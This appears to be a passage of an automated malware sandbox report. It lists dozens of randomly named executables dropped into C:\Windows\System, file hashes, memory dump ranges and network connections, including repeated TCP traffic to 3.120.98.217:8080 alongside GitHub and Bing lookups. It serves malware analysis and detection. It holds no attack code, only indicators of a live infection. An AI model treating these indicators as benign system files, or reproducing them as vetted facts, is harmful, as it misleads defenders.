C:\Windows\System\kbEAjMz.exe

C:\Windows\System\byfQeEE.exe

C:\Windows\System\byfQeEE.exe

C:\Windows\System\NhsVtPd.exe

C:\Windows\System\NhsVtPd.exe

C:\Windows\System\luuMEkf.exe

C:\Windows\System\luuMEkf.exe

C:\Windows\System\dpuiAUD.exe

C:\Windows\System\dpuiAUD.exe

C:\Windows\System\qfZJBLY.exe

C:\Windows\System\qfZJBLY.exe

C:\Windows\System\wnCWbRI.exe

C:\Windows\System\wnCWbRI.exe

C:\Windows\System\RBUCpVD.exe

C:\Windows\System\RBUCpVD.exe

C:\Windows\System\jkwztjz.exe

C:\Windows\System\jkwztjz.exe

C:\Windows\System\LYudRaT.exe

C:\Windows\System\LYudRaT.exe

C:\Windows\System\xtECURl.exe

C:\Windows\System\xtECURl.exe

C:\Windows\System\EzvjQjx.exe

C:\Windows\System\EzvjQjx.exe

C:\Windows\System\WizAupO.exe

C:\Windows\System\WizAupO.exe

C:\Windows\System\RlxhRvb.exe

C:\Windows\System\RlxhRvb.exe

C:\Windows\System\duLnXfB.exe

C:\Windows\System\duLnXfB.exe

C:\Windows\System\YzzzfXr.exe

C:\Windows\System\YzzzfXr.exe

C:\Windows\System\JrGXGqz.exe

C:\Windows\System\JrGXGqz.exe

C:\Windows\System\pGBXDkv.exe

C:\Windows\System\pGBXDkv.exe

C:\Windows\System\BVqMPhC.exe

C:\Windows\System\BVqMPhC.exe

C:\Windows\System\HLZtmBU.exe

C:\Windows\System\HLZtmBU.exe

C:\Windows\System\NgQJMiJ.exe

C:\Windows\System\NgQJMiJ.exe

C:\Windows\System\FeiFojU.exe

C:\Windows\System\FeiFojU.exe

C:\Windows\System\rWRfJdO.exe

C:\Windows\System\rWRfJdO.exe

C:\Windows\System\QLPHCVj.exe

C:\Windows\System\QLPHCVj.exe

C:\Windows\System\IMcmGEU.exe

C:\Windows\System\IMcmGEU.exe

C:\Windows\System\DOWKBTx.exe

C:\Windows\System\DOWKBTx.exe

C:\Windows\System\HbbHHuu.exe

C:\Windows\System\HbbHHuu.exe

C:\Windows\System\eYYxhHO.exe

C:\Windows\System\eYYxhHO.exe

C:\Windows\System\JEtbbCK.exe

C:\Windows\System\JEtbbCK.exe

C:\Windows\System\TaqVjir.exe

C:\Windows\System\TaqVjir.exe

C:\Windows\System\Uopphji.exe

C:\Windows\System\Uopphji.exe

C:\Windows\System\rsKXnSV.exe

C:\Windows\System\rsKXnSV.exe

C:\Windows\System\IhMILQx.exe

C:\Windows\System\IhMILQx.exe

C:\Windows\System\NeFkBKt.exe

C:\Windows\System\NeFkBKt.exe

C:\Windows\System\EEySIxA.exe

C:\Windows\System\EEySIxA.exe

C:\Windows\System\UMWkFDB.exe

C:\Windows\System\UMWkFDB.exe

C:\Windows\System\dWUIjWy.exe

C:\Windows\System\dWUIjWy.exe

C:\Windows\System\lHfSJSx.exe

C:\Windows\System\lHfSJSx.exe

C:\Windows\System\oYjXCJx.exe

C:\Windows\System\oYjXCJx.exe

C:\Windows\System\MoNfcbl.exe

C:\Windows\System\MoNfcbl.exe

C:\Windows\System\BWybwDR.exe

C:\Windows\System\BWybwDR.exe

C:\Windows\System\pDOcCBj.exe

C:\Windows\System\pDOcCBj.exe

C:\Windows\System\awqYeND.exe

C:\Windows\System\awqYeND.exe

C:\Windows\System\ZOHFbCQ.exe

C:\Windows\System\ZOHFbCQ.exe

C:\Windows\System\ppkJpmV.exe

C:\Windows\System\ppkJpmV.exe

C:\Windows\System\fSyPkNU.exe

C:\Windows\System\fSyPkNU.exe

C:\Windows\System\EgjgZvS.exe

C:\Windows\System\EgjgZvS.exe

C:\Windows\System\SMnPyrC.exe

C:\Windows\System\SMnPyrC.exe

C:\Windows\System\pCwBPBK.exe

C:\Windows\System\pCwBPBK.exe

C:\Windows\System\IphhGDe.exe

C:\Windows\System\IphhGDe.exe

C:\Windows\System\lDWieAk.exe

C:\Windows\System\lDWieAk.exe

C:\Windows\System\hoPHxnw.exe

C:\Windows\System\hoPHxnw.exe

C:\Windows\System\KFoBCim.exe

C:\Windows\System\KFoBCim.exe

C:\Windows\System\xqAeYrx.exe

C:\Windows\System\xqAeYrx.exe

C:\Windows\System\uKjDVxx.exe

C:\Windows\System\uKjDVxx.exe

C:\Windows\System\QzPiecp.exe

C:\Windows\System\QzPiecp.exe

C:\Windows\System\FHgWPdJ.exe

C:\Windows\System\FHgWPdJ.exe

C:\Windows\System\bjceWRo.exe

C:\Windows\System\bjceWRo.exe

C:\Windows\System\AXDFgnS.exe

C:\Windows\System\AXDFgnS.exe

C:\Windows\System\WvGDguP.exe

C:\Windows\System\WvGDguP.exe

C:\Windows\System\MweUwhj.exe

C:\Windows\System\MweUwhj.exe

C:\Windows\System\trmucjD.exe

C:\Windows\System\trmucjD.exe

C:\Windows\System\QJgRpvv.exe

C:\Windows\System\QJgRpvv.exe

C:\Windows\System\hZOFwzt.exe

C:\Windows\System\hZOFwzt.exe

C:\Windows\System\EcFFmTr.exe

C:\Windows\System\EcFFmTr.exe

C:\Windows\System\qFEYhrf.exe

C:\Windows\System\qFEYhrf.exe

C:\Windows\System\WFPoOkr.exe

C:\Windows\System\WFPoOkr.exe

C:\Windows\System\sRdzwLf.exe

C:\Windows\System\sRdzwLf.exe

C:\Windows\System\FhLQZZx.exe

C:\Windows\System\FhLQZZx.exe

C:\Windows\System\vQhAZcr.exe

C:\Windows\System\vQhAZcr.exe

C:\Windows\System\dXViSxN.exe

C:\Windows\System\dXViSxN.exe

C:\Windows\System\KLjrziV.exe

C:\Windows\System\KLjrziV.exe

C:\Windows\System\SPJhRLO.exe

C:\Windows\System\SPJhRLO.exe

C:\Windows\System\rLbQIbK.exe

C:\Windows\System\rLbQIbK.exe

C:\Windows\System\roXoxbM.exe

C:\Windows\System\roXoxbM.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp

Files

memory/1000-0-0x00007FF616E30000-0x00007FF617226000-memory.dmp

memory/1000-1-0x0000024BADE40000-0x0000024BADE50000-memory.dmp

C:\Windows\System\EGNcEww.exe

MD5 9fda1eeaee37a3582ef0484f588cdf48
SHA1 2b0b611a95fa95a2dcbaa2754d29ff956262d310
SHA256 e572ba2fe3b144cad186dc4a95d1a314c97ddffbf28df76efa0a73197a188560
SHA512 a32bd9fddafefb7ad105f96342e010e48df9c351ef9a2513d8a3033b9e86cbfeaab94f07706b2c12e6cd769345a17a32e527559381743ab3fef5fafac024b1e9

C:\Windows\System\XZurXJK.exe

MD5 837410c54b94efe54cd6a07f885e681f
SHA1 6d29cfda94fbe7df116d00a581b6a62584a54dfc
SHA256 db77a939f62adfdeb79c19ffee834d0ef53f463f21966d76c80395e428e75a83
SHA512 040380f3612dc68dde15f86e47b8d42d7a5ea3b59b5a5a0e78b4f61922e42658d85b23c815483440459c4e7c3c72acdf7b772cb328364f58b1a7858de01a8c8e

C:\Windows\System\mBvLyfK.exe

MD5 edc9a51fb28e37fac3ea63a244dcace2
SHA1 a2b14cc42245650e2474bb6891d08afb6c5cf390
SHA256 b28cb8b3f707f150f01c500a502d93345543644bfc895ffa517600e01902e5d6
SHA512 4355447f44ce87bf4e8775d00416c64f664b2f1350b93382a30206e219139e45c5826c8dd06520d0759d4419fc4106d1aa99c2451b4ce9e4f3748dbb6e804156

memory/3320-38-0x00007FFF77AD0000-0x00007FFF78591000-memory.dmp

C:\Windows\System\kIWtHjZ.exe

MD5 35f8c650b680ff636a5f7da1cd6fead5
SHA1 084628054a25a4aa67a2fe3d50bc59b1506ccfd5
SHA256 8a7d414480c7b07a5cc7326a5d0b294a59cf64970e1c6a89ed47b55d010ba6ec
SHA512 813a88a57226f1a103d96416c6e407834c9996c083475e8e6560f3442773e6d7bbf3f8a6ae7887836fdc58d374582e00a2e5ef3813d9aeb21d427baef93a42aa

C:\Windows\System\qWxgkCu.exe

MD5 875e046e1abd42641e67df4cdf3266d8
SHA1 00aed2d53018eac290380de8ef40fa17c2c22bb8
SHA256 fd9a187fe0be3d517f01b8ec3b5e800ff4c0ae3271fbe5a371c270497219f910
SHA512 9ec107761aef3dd2119624bd6538ef6b7a9db1cafd35fb918cfa944ed59d84b1db9cd7e9a2324d3780e4c82db4726da819e5323ab9b17bce9852407d987a9f78

C:\Windows\System\nIHjXjJ.exe

MD5 a5790cfedb4894729cfbe4641baafb8c
SHA1 5c38568cfeda080bc3fa75e1c2c9d0f576debdb3
SHA256 c4e96efacf24bb4f0a7811f8b95694c79455e935af874028d753089d09e319b1
SHA512 028af45d3e51b3dae3ada18d0e6a0c312e8cf0e4500f876f594d67bd829fec59567bf00c5b5d73168cf43a36b3b5cf68233caade1eb79d4c044d059c96d56112

C:\Windows\System\RNJGaYr.exe

MD5 97a278903bb7e9f8c0dabee7cfe48379
SHA1 75205ab07e05ea5d720806282340beea5592d39c
SHA256 347e27f5cabb2046a44716807b72ee14fbafe50941c59cd2e7937300ed3a73a7
SHA512 733739d4262db336b4a7595674d7c2e3786ca5119f4ff612cbf7922ab5f3dfaad09a869cc65cc6ac6742c65d77edac20a4469e67b6b91092e9bbf5839084e4c2

C:\Windows\System\wAxzair.exe

MD5 92478ef4855e046ecc6543ebab85f1e2
SHA1 757629c15d87b4ce031de5fac6c00e0df8a152ce
SHA256 9fa5ea3bdafd0c1ed564e0a787c93d5483e0055cd5e563486dab5af1324a663c
SHA512 0b3062378b8298fc3b7b5ce3d7fb7c0100ae5ed6b37d7ef5dc0f744c8f7da829f96e49d2fe40df662ff6a97f3c4c7b0ae04e73a2c9edcf74769566c28cd809c1

C:\Windows\System\HMTdzyw.exe

MD5 8a5f67afc91c1ee0c9e1189879500673
SHA1 184162fbb33c171264a7dd0c9d260cd431b7c6ef
SHA256 2040ad444a53c612c0b0ebc9cf924b67f24aff346c44a17ba94c474c1273bc53
SHA512 ca1761e504eaf9bc974e09abd493b64ca9d0c537b40c147473a44aeb6de2ca422e0decd0ae8e6d4e0f64f6ea13d81b9de0a46d8a3001b2d64dfa8774335778be

C:\Windows\System\XsvdTeP.exe

MD5 c6750f10d1936b6be275fdbfbacdeb86
SHA1 5e2e65fec3310fc19d1ccdd7aca4295c287b7dcf
SHA256 9027baf5854dd97b7f55079d7c72259cd7d8a4f0d7056283b8fd4b7318019f7a
SHA512 5da9758e410cbb6fbec7b765200fd9fca15bab644d7ccf6cdc871b818f350fdd98fd985f550b1da6080b569c069a054a8f7f42717d85d7d3e8b604103a6c039a

C:\Windows\System\ibqjdFd.exe

MD5 a39e6ae47db694c28986f2dd7a1a3230
SHA1 1de3f7767cb825922fafd372148decc43397be8b
SHA256 9b02903bbd83f655102f05c1fc2f6bf4bb6dd22e3c5316b7f06e78a8ca8577d6
SHA512 8b8959679fa6f6ffa2d5b4c5cbf98e1b572700e76fd854d166380b6aee39ef25c8eae04fd56b313327768d9fc788f7c95f29169808216c483cfa957ad294e0cb

C:\Windows\System\EynFELo.exe

MD5 2117c2bc4001ca5e8755a80bbe10a2f0
SHA1 efde888137950d789192f34631163bb36b08d422
SHA256 d92420aa27396249bebee7463c0667cbc73180e7e493fa14981f89b467589720
SHA512 72bd40ce37c52b6faa89ac8f44b600a2eea7def4c41863fc3540b359b88013e9efe2dd901bb1107415201939b35a2c73e2a891f1ac372b8f490c5d203377336d

memory/3320-821-0x00007FFF77AD0000-0x00007FFF78591000-memory.dmp

C:\Windows\System\rBaUMtP.exe

MD5 d165088a0a97c53cca139d7c1eb42e37
SHA1 40d764d12acd625cbb41f8f18efa4c9563efff82
SHA256 f48ef61babc598ddb8065c4dc8188ed29679b4d4e3bfa9a64f8d10e9a1d0403f
SHA512 e42591d94c80f72f7b896e9b80d16b90b3703887fb57ce3333bc7a4646209d519a065c3aad4b4df324e8d7c7242aee90a3bcb8b6b429ce3b70cdd84782f6ea14

C:\Windows\System\HDhOXsB.exe

MD5 845243db8f7262fb88bb47c46ecf704c
SHA1 80dac89c8427082b15940b62699fc742c596317a
SHA256 2ffb4294470c4dd10e5c89d2a501f1a67a6a1acb38d87b403662ad7d36fbba30
SHA512 b0ae7ab759f2f41db008477853d4869f27268a90ec94bfd691af40bb109ab75623c682b645aa2f72402c5cfcc1867d488bb58d1eb5d08f84900736a7583b25b7

C:\Windows\System\TCdjXnj.exe

MD5 8ed27c08f9d378febbaad8f52b06e014
SHA1 9fb76215c33fcaa82e0fa11e259c16839f036266
SHA256 36009361629e086705d484b588780ca65deb8e3dc4b90db4ae1a0714be49d055
SHA512 d8aa52ae41e01985992dac7b913779f9d68eb244f73c55c2b05fed4ac06bba1a569395d98db6a8a349cb210287690b66b22401c607344f9063728b2e1abb5433

C:\Windows\System\JxNtYwE.exe

MD5 d104e224ab5dd402f3aec320a7223c28
SHA1 3fb40a362b7a53878e0990340d8096d98655cca2
SHA256 08e2c2401e2185e63203cfd2841794018507ee506326ed4873b4dd56d0fa4854
SHA512 b693edc8add689bff3d9693994c834de86a35b0ba4dd51fafcfe7982ffe2ee25c91e00cfad1d4667433ac5ce1a540c237cbefb837bc95303a09c102d0df43092

C:\Windows\System\KPZcOTx.exe

MD5 fff5289993f4c4ff05f1b69e09289587
SHA1 e1c0d6e400c34a798ad4a138da7848fd04d8dfc8
SHA256 cec523f73737cfda228cc98c75ca4099a88c55fc6ef73bb454d19fb673586539
SHA512 795b87f2d8b7c22068a5945284dcc2faeab8c2369e934bbba3e5a53d7e45915f063d2df1bd09f33da7d9800e6bc0819aed5d657cab8c1b7c687ce77011fe63b0

C:\Windows\System\qNqSUcz.exe

MD5 7241884fd215f9ed486ed2795aabdd4f
SHA1 fb215d04610fadc45ce4416116e2e9ace8159898
SHA256 078a271efd261942093329a176923ac546e924dad03a87b2c2956c3483dac34f
SHA512 3af0c79e28e24525329bd752a4bcbed655d0587d82476f8247a8b9a91cc289e5a4e68fee1d8f676017bb52afc1d439cf5dddb2e252b592d2b9bc1fc08ce36800

C:\Windows\System\HDMtEKK.exe

MD5 077ac952fbfef200934a8a9b47754468
SHA1 b2e10efab4153c886f02a6d9c1f4c958a72159d6
SHA256 367250029a3ab55a73a9e2b9b8f02051f3115a84f21579dca53185bb5494236d
SHA512 63ffa4a27218473d3871210f91aa662380390e2a055141d07427db86ee62b22f096b82a0a5f5fa25afd6a62eed7fd18f95567250f97d0fad67fe07113d1c53b3

C:\Windows\System\QGQuexY.exe

MD5 b3381589fc21acb100b4e26fce94a48e
SHA1 0f18d812c85a53e154d234072d116e2851cf7177
SHA256 389e22b51029a74af09bf40b07d56f873fc3ef7fc1798a625d551d083c47f6a1
SHA512 6b25fe64d98238bfcd816b5c1de27ebc95b986951c05f3b9c0f0d57d3202832db5b0f5c418ac659f992b27191531cfa5b34e851ba39d21efa91a97d7805d0e23

C:\Windows\System\PgMVAQi.exe

MD5 d940f77c59c5b885b37f2b829672b338
SHA1 481e3546f3c0b36c34f53d7465b93cb0387c2bcc
SHA256 179883681806d141599d6c054c70e6190a6e17bc05f74803c29967b669631919
SHA512 2b5f9c9279a61276fcc8689a981c843504a9f715e39b6a154acf8218655fd5001bba8946a99609cbc09db453926cfb45ff3ddfc783321444cce039d06cf55c08

C:\Windows\System\PhpdMap.exe

MD5 26c4c43ad47c6ef9601725e0ee2e2bc3
SHA1 448ef4e679e7f7739da669cd30b3ff50ac2545c0
SHA256 de18742333b04cd9ad2cebdf84085bc01f22a1bfcfdc48856acf7c2226e28c19
SHA512 02455fdae45a72923aeb40357f000a60f0ac63a9ca81c23c6af42eba4232bbe666f6ee8f608554265ff4e24f5ab394b820c652aa5a1e76efaf36db68080b8c2d

C:\Windows\System\ZOWChDr.exe

MD5 8ea9c36f06abe010200633b12bf30243
SHA1 6bf8117ea2701cfda1b7d298d518a8de527f21b1
SHA256 64e46286163b83a9009c0a4a12685f4361b85e3a72007b179fc7c14203484fdc
SHA512 a2c4cb71e82ce4c6e4c5d1e19064c6293eadebf47e6eef214e6c1622589bff377e1cbeb43f2407909d056b828c85261c1232aeb5b2050dbecb21fb4b65423c6f

C:\Windows\System\HNISsuw.exe

MD5 e9c72336645d4dbea777fd4775e3399e
SHA1 4a289bcc90cc1a4e4926ce1eeb513532cf8dd633
SHA256 a260df1360474141f59cb3d1b860ad465631174d4b69895c1cdba9fa10ee4ac4
SHA512 6b4096ca94c5c9ff33ecdd55b0b37a44c8fce65d131058f2902595fb2a0a655f4e370c07f33d16b3208402902c36f0d915e0e83b2d409e2a49426617c4c99f49

C:\Windows\System\sAHKWry.exe

MD5 7cea3bc51bade22493156d59d91257af
SHA1 84f96a76d872a580acf8a38f3beaa6b1b0ccb6ff
SHA256 6c76ef60743c31afad9b63d870a9283c04e9abfcfc61a717ae60ee31a8048ebb
SHA512 61cf99f7d8cf14744c1140f1cfb7730f3b745a3e6938a4f19a1f39d8690e761ce582537770fe87e447aa41e3a1255f7e3e0dc96bb0ad35e42138673da36fe8a7

C:\Windows\System\EsFuPGD.exe

MD5 59cd8af73c8c0e2e90a063d8d1c38cff
SHA1 9fe839d79118b8235779eaed0ec7cfb7acedc026
SHA256 cac2d6c0585c24f47d130fd9961908ffbc77dfce1ee881ab7ef48de9bce22df1
SHA512 53bdd4b05de0f6532daeb32e5851e96984d76368d1245f9650060e184d0371752c79957cf8c97446a97d5a40308c4b12716ecb9b4bca4c7ecc93e05d233bf5e2

C:\Windows\System\iBkIpAE.exe

MD5 ddeb39ec8493e59f6f2083edffa8795d
SHA1 ec5b6a154be361a22868957054b5f41bde449839
SHA256 17a7e05115d1d2cdd0c8ee625509cb7c6409120a497b8ee97c94005958b61ed6
SHA512 c8208b0cab9caec42f8ffe6c4e212ee5a76322913ef3adc77665a20ae64fc20e2e21ec5a8dade7f2996103c362726a8ea19159d84f675d65c7b8fd51488215f0

C:\Windows\System\ZAffQWP.exe

MD5 493e1ba82873652d0e9c088d4db190d1
SHA1 268d99d3456431c690a1ed8b85349708d9797650
SHA256 25d46442cced54e33307da3664862fadf54736195f7d44dd3cdcf94f20d374d2
SHA512 e8ae70a7296d0eec36a3ecd00f6f53859fd60bb2c8828d9aa0de12ca80d884e35b943cecdf50e5c9488f60d3d56549e1a074cea517845b63ea845ffa8d0a561a

C:\Windows\System\gtHSbER.exe

MD5 407104ee1176da9d5dd86686ce7bc1fd
SHA1 97833927df7e0d2dab89e8d95dc7e3a2a127eb55
SHA256 6c0617235f59478c9aeda1dc2ec52eabf46f0f79fd3941933386a5f800055e08
SHA512 e3e70132f64edf1427256b96df4358aaede335908d8a368d32e4fd9e58fdeb6376314afa2d982dc99a66a5562ca111580a1a1dd1fa573fc7dbce04ef6abe231a

C:\Windows\System\yEGriTw.exe

MD5 233ef15e5873458939c40a055a23f4ae
SHA1 45c584d6c0e8589a082ae5a0d4e7e74a28ad72ec
SHA256 3c6582974c8336aa9e8024f53c90d0ef94f89ac670dc4eabbe1acf459f8ed3ee
SHA512 2f7cd70b67a6a466e0bc7e6fa8caa76d34633d9f445904257dd6ffbc865705308de5709307ab385b91e1eb627a487ee0af452f0e632d90f49aa975b33f22f9d5

C:\Windows\System\XLHGrSt.exe

MD5 a7e7e572cd3cb89663f0eec4fde42fa2
SHA1 2131de3888c0c9ccc1c3dd20e7e2a229838519a0
SHA256 e29b7d2289009a617bc80c5d356e4106eb8cf6da3ec1871f190ce7d86516d13a
SHA512 e4f08bc001bef67952da537db9dd1182432ace4575f8d76ea1c32029a2e9a8e598f63a1775ee540b216e0b9f817b49e1c29e1e3ea50a53918eb87296dab2ad43

C:\Windows\System\DMxWrra.exe

MD5 a2c40d61b4e9fcf5fe8eaa7094b8ca55
SHA1 429ede216d699fe179490fe674685b2fef231582
SHA256 607770cfacd42f8c54704e437e178f23ce1cdfb9f41ba922de041235500474bf
SHA512 092441ac5f18dbff45b3e83f472591525afdbaae13b77c46be4671d48c02dcd4ea65c7d7579c1c5e5ebe876f77eff8ee2ede29f9b2e3b26a9ba423ee0f6bccea

memory/3320-35-0x00000251CFB50000-0x00000251CFB72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5gjqwq15.xlv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\System\aBjDFgB.exe

MD5 79afa92060fc7db57c8ab29e2a2b63d9
SHA1 0726e3f61037cae3da9a386ab09fcc576508e088
SHA256 1c9f813e908be744eaf4024daa78f67fe84a3b1e2c678903758315ef0e041cce
SHA512 828d2874f8e33bc9a1e57f0a40dca533a4349de5ab1c3e2a2aa952b8a48cb429df86a1064cea7dae3461dd47a8c542bf45877cc7095a67764b12995d407b1929

memory/4932-12-0x00007FF6A6130000-0x00007FF6A6526000-memory.dmp

memory/3320-5-0x00007FFF77AD3000-0x00007FFF77AD5000-memory.dmp

memory/1412-826-0x00007FF635AE0000-0x00007FF635ED6000-memory.dmp

memory/3616-831-0x00007FF7B2480000-0x00007FF7B2876000-memory.dmp

memory/4928-838-0x00007FF7B0620000-0x00007FF7B0A16000-memory.dmp

memory/4972-862-0x00007FF6C61E0000-0x00007FF6C65D6000-memory.dmp

memory/3036-857-0x00007FF7B1320000-0x00007FF7B1716000-memory.dmp

memory/2004-854-0x00007FF74FED0000-0x00007FF7502C6000-memory.dmp

memory/4212-848-0x00007FF77F5A0000-0x00007FF77F996000-memory.dmp

memory/5024-835-0x00007FF796520000-0x00007FF796916000-memory.dmp

memory/4436-869-0x00007FF624900000-0x00007FF624CF6000-memory.dmp

memory/3328-879-0x00007FF7EA950000-0x00007FF7EAD46000-memory.dmp

memory/1620-884-0x00007FF6E7430000-0x00007FF6E7826000-memory.dmp

memory/3860-891-0x00007FF65B020000-0x00007FF65B416000-memory.dmp

memory/1240-895-0x00007FF606380000-0x00007FF606776000-memory.dmp

memory/2880-893-0x00007FF6E46B0000-0x00007FF6E4AA6000-memory.dmp

memory/2512-919-0x00007FF64BC90000-0x00007FF64C086000-memory.dmp

memory/3736-922-0x00007FF7D55A0000-0x00007FF7D5996000-memory.dmp

memory/1628-901-0x00007FF7DA1D0000-0x00007FF7DA5C6000-memory.dmp

memory/1516-923-0x00007FF6FE0F0000-0x00007FF6FE4E6000-memory.dmp

memory/1928-932-0x00007FF66E0C0000-0x00007FF66E4B6000-memory.dmp

memory/1396-935-0x00007FF711F30000-0x00007FF712326000-memory.dmp

memory/4876-924-0x00007FF676DF0000-0x00007FF6771E6000-memory.dmp

memory/1596-981-0x00007FF6A30B0000-0x00007FF6A34A6000-memory.dmp

memory/4976-984-0x00007FF68A8F0000-0x00007FF68ACE6000-memory.dmp

memory/3320-990-0x00000251D0970000-0x00000251D1116000-memory.dmp

memory/3320-2144-0x00007FFF77AD3000-0x00007FFF77AD5000-memory.dmp

memory/4932-2145-0x00007FF6A6130000-0x00007FF6A6526000-memory.dmp

memory/1396-2146-0x00007FF711F30000-0x00007FF712326000-memory.dmp

memory/1596-2147-0x00007FF6A30B0000-0x00007FF6A34A6000-memory.dmp

memory/3616-2149-0x00007FF7B2480000-0x00007FF7B2876000-memory.dmp

memory/1412-2148-0x00007FF635AE0000-0x00007FF635ED6000-memory.dmp

memory/3036-2150-0x00007FF7B1320000-0x00007FF7B1716000-memory.dmp

memory/5024-2154-0x00007FF796520000-0x00007FF796916000-memory.dmp

memory/4976-2155-0x00007FF68A8F0000-0x00007FF68ACE6000-memory.dmp

memory/4972-2156-0x00007FF6C61E0000-0x00007FF6C65D6000-memory.dmp

memory/4928-2153-0x00007FF7B0620000-0x00007FF7B0A16000-memory.dmp

memory/4212-2152-0x00007FF77F5A0000-0x00007FF77F996000-memory.dmp

memory/2004-2151-0x00007FF74FED0000-0x00007FF7502C6000-memory.dmp

memory/4436-2157-0x00007FF624900000-0x00007FF624CF6000-memory.dmp

memory/3328-2158-0x00007FF7EA950000-0x00007FF7EAD46000-memory.dmp

memory/1628-2168-0x00007FF7DA1D0000-0x00007FF7DA5C6000-memory.dmp

memory/2512-2167-0x00007FF64BC90000-0x00007FF64C086000-memory.dmp

memory/3736-2166-0x00007FF7D55A0000-0x00007FF7D5996000-memory.dmp

memory/1516-2165-0x00007FF6FE0F0000-0x00007FF6FE4E6000-memory.dmp

memory/4876-2164-0x00007FF676DF0000-0x00007FF6771E6000-memory.dmp

memory/1928-2163-0x00007FF66E0C0000-0x00007FF66E4B6000-memory.dmp

memory/1620-2162-0x00007FF6E7430000-0x00007FF6E7826000-memory.dmp

memory/3860-2161-0x00007FF65B020000-0x00007FF65B416000-memory.dmp

memory/2880-2160-0x00007FF6E46B0000-0x00007FF6E4AA6000-memory.dmp

memory/1240-2159-0x00007FF606380000-0x00007FF606776000-memory.dmp